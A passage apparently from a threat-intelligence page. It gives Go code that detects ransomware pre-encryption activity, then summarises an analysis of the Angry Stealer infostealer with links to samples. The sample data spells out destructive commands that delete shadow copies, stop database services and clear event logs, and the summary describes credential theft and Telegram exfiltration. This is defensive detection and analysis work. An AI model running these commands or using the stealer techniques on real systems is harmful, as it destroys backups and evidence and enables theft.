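// assuming wevtutil, which the article does not name.
var techniques = []struct {
	Tag string
	Re  *regexp.Regexp
}{
	{"shadow-copy-deletion", regexp.MustCompile(`(?i)\bvssadmin(\.exe)?\s+delete\s+shadows\b`)},
	{"rdp-session-tamper", regexp.MustCompile(`(?i)\breg(\.exe)?\s+add\b.*Terminal Services.*MaxDisconnectionTime`)},
	{"db-service-stop", regexp.MustCompile(`(?i)\bnet(\.exe)?\s+stop\s+MSSQLSERVER\b`)},
	{"eventlog-clear", regexp.MustCompile(`(?i)\bwevtutil(\.exe)?\s+(cl|clear-log)\b`)},
}

// Classify returns the technique tags a command line matches.
func Classify(cmd string) []string {
	var tags []string
	for _, t := range techniques {
		if t.Re.MatchString(cmd) {
			tags = append(tags, t.Tag)
		}
	}
	return tags
}

// Correlate raises one alert per host when two or more distinct techniques
// show up within window of each other; a lone shadow-copy deletion from a
// backup job is noise, the combination is not.
func Correlate(events []Event, window time.Duration) []string {
	sort.Slice(events, func(i, j int) bool { return events[i].Time.Before(events[j].Time) })
	type hit struct {
		at  time.Time
		tag string
	}
	seen := map[string][]hit{}
	alerted := map[string]bool{}
	var alerts []string
	for _, e := range events {
		for _, tag := range Classify(e.CommandLine) {
			seen[e.Host] = append(seen[e.Host], hit{e.Time, tag})
		}
		distinct := map[string]bool{}
		for _, h := range seen[e.Host] {
			if e.Time.Sub(h.at) <= window {
				distinct[h.tag] = true
			}
		}
		if alerted[e.Host] || len(distinct) < 2 {
			continue
		}
		tags := make([]string, 0, len(distinct))
		for tag := range distinct {
			tags = append(tags, tag)
		}
		sort.Strings(tags)
		alerts = append(alerts, fmt.Sprintf("%s at %s: ransomware pre-encryption activity %v", e.Host, e.Time.Format(time.RFC3339), tags))
		alerted[e.Host] = true
	}
	return alerts
}

// sampleEvents are constructed (not from the article): WS01 shows the full
// sequence, WS02 only a benign shadow-copy listing and a text editor.
func sampleEvents() []Event {
	t := time.Date(2024, 8, 29, 10, 0, 0, 0, time.UTC)
	return []Event{
		{t, "WS01", `vssadmin.exe delete shadows /all /quiet`},
		{t.Add(5 * time.Second), "WS01", `reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v MaxDisconnectionTime /t REG_DWORD /d 1209600000 /f`},
		{t.Add(7 * time.Second), "WS01", `net.exe stop MSSQLSERVER /f /m`},
		{t.Add(3 * time.Minute), "WS01", `cmd.exe /c temp.cmd`},
		{t.Add(4 * time.Minute), "WS01", `wevtutil.exe cl Security`},
		{t.Add(2 * time.Minute), "WS02", `vssadmin.exe list shadows`},
		{t.Add(9 * time.Minute), "WS02", `notepad.exe report.txt`},
	}
}

func main() {
	for _, a := range Correlate(sampleEvents(), 5*time.Minute) {
		fmt.Println("ALERT", a)
	}
}
```

The window is the tuning knob: the quoted commands run within seconds of each other in the described infection, so even a one-minute window catches the sequence while leaving a nightly backup job that deletes shadow copies on its own unflagged. Matching on the registry value name (MaxDisconnectionTime) rather than the full path keeps the rule robust to quoting and case differences in the command line.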


Download

2024-08-23 ANGRY STEALER (Rage Stealer variant, Telegram RAT) Samples




2024-08-23 Cyfirma. A Comprehensive Analysis of Angry Stealer : Rage Stealer in a New Disguise (Telegram rat).

CYFIRMA analysed the malware known as "Angry Stealer", heavily advertised on platforms such as Telegram and found to be a repackaged version of the previously identified "Rage Stealer".
  • The dropper is a 32-bit Win32 executable written in .NET that acts as the initial stage of the attack. On execution it deploys two payloads: "Stepasha.exe" and "MotherRussia.exe".
  • Stepasha.exe - The Info-Stealer:
    • Once deployed, "Stepasha.exe" begins an extensive data collection process. It targets sensitive information stored on the infected system, including browser data (passwords, cookies, autofill data), cryptocurrency wallets, VPN credentials, and system information.
    • The collected data is then packaged into a ZIP file and exfiltrated to a remote Telegram channel. This process leverages hardcoded credentials and bypasses SSL validation, ensuring the data reaches the attacker without interruption.
    • The malware incorporates techniques to avoid detection, such as tampering with file timestamps and ensuring only one instance runs at a time.
  • MotherRussia.exe - The Builder Tool:
    • This secondary payload acts as a builder, allowing the creation of additional malicious executables. The user provides specific inputs, such as bot tokens and chat IDs, which are then embedded into the generated executable.
    • The tool is likely designed for tasks related to remote desktop operations or bot interactions, making it easier for attackers to automate and scale their malicious activities.
  • "Angry Stealer" is a direct descendant of "Rage Stealer", sharing the same codebase and functionality. Rebranding lets cybercriminals market the same malware under a new name, reaching new buyers and reusing proven tactics while avoiding the detection that comes with a known name.
  • The dropper was compiled in a .NET environment, likely within an isolated setup like Windows Defender Application Guard, suggesting that the developers took precautions to avoid detection during development.


Download